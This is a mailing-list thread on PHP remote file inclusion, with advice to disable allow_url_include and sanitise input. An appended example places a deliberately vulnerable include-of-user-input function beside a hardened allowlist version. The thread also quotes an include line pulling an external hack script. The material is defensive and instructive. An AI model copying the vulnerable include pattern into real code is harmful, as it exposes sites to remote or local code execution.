Yes, and scrubbing the input to ensure the field used for this URL rejects certain characters, or doing sanity checking on it, would also be another suggestion. Turning this off would fix remote include requests, but you still need to check for people requesting local files. You should never take user input and put it directly into include or shell execs or anything.

On Jun 8, 2010, at 11:55 AM, "David Stoltz" <> wrote:

allow_url_include is (or should be) disabled by default.

I can't think of one good reason to ever enable this, it would be a
security issue no matter how you slice it...

-----Original Message-----
From: Igor Escobar []
Sent: Tuesday, June 08, 2010 10:11 AM
Cc: <>
Subject: Re: [PHP] Security Issue

Hey Richard,

I'll find more about this parameter allow_url_include, thank you!

Igor Escobar
Systems Analyst & Interface Designer

+ @igorescobar (twitter)

On Mon, Jun 7, 2010 at 5:26 PM, richard gray <> wrote:

On 07/06/2010 20:00, Igor Escobar wrote:

PHP Injection is the technical name given to a security hole in PHP
applications. When this gap exists, a hacker can include an external file
that is interpreted as internal code, as if the included code were part
of the script.

// my code...
// my code...
include ('http://..../externalhackscript.txt');
// my code...
// my code...

can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. allow_url_include = Off in php.ini


PHP General Mailing List (
To unsubscribe, visit:

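An added example, not code from the thread, putting the two pieces of advice above side by side: the include-of-raw-input pattern the thread warns about, and a hardened version that keeps richard's allow_url_include = Off as the backstop but never hands the request value to include at all, so local file requests are blocked too. The pages/ directory, the "page" parameter and the allowlist contents are assumptions.

```php
<?php
// Example code, not from the thread. Assumes templates live in ./pages/
// and the request parameter is called "page" (both assumptions).

// VULNERABLE: the request value flows straight into include().
// With allow_url_include=On this is remote file inclusion; with it Off
// it is still local file inclusion, since the value selects any file
// the PHP process can read.
function render_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: allowlist of page names, then a realpath() confinement check.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'about', 'contact'];

function resolve_page(string $page): ?string
{
    // 1. Reject anything that is not a plain identifier (no slashes,
    //    dots, colons or NUL bytes can get through this pattern).
    if (!preg_match('/^[a-z][a-z0-9_]{0,31}$/', $page)) {
        return null;
    }
    // 2. Only names we deliberately ship may be included.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 3. Belt and braces: the resolved path must stay inside PAGE_DIR
    //    (realpath() follows symlinks, so a symlinked template cannot
    //    point outside the directory either).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $page . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function render(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;   // a vetted filesystem path, never the raw input
}

render((string)($_GET['page'] ?? 'home'));
```

Rejected requests are a useful thing to log: a steady stream of 404s from resolve_page() on one client is a cheap detection signal for someone probing the include parameter.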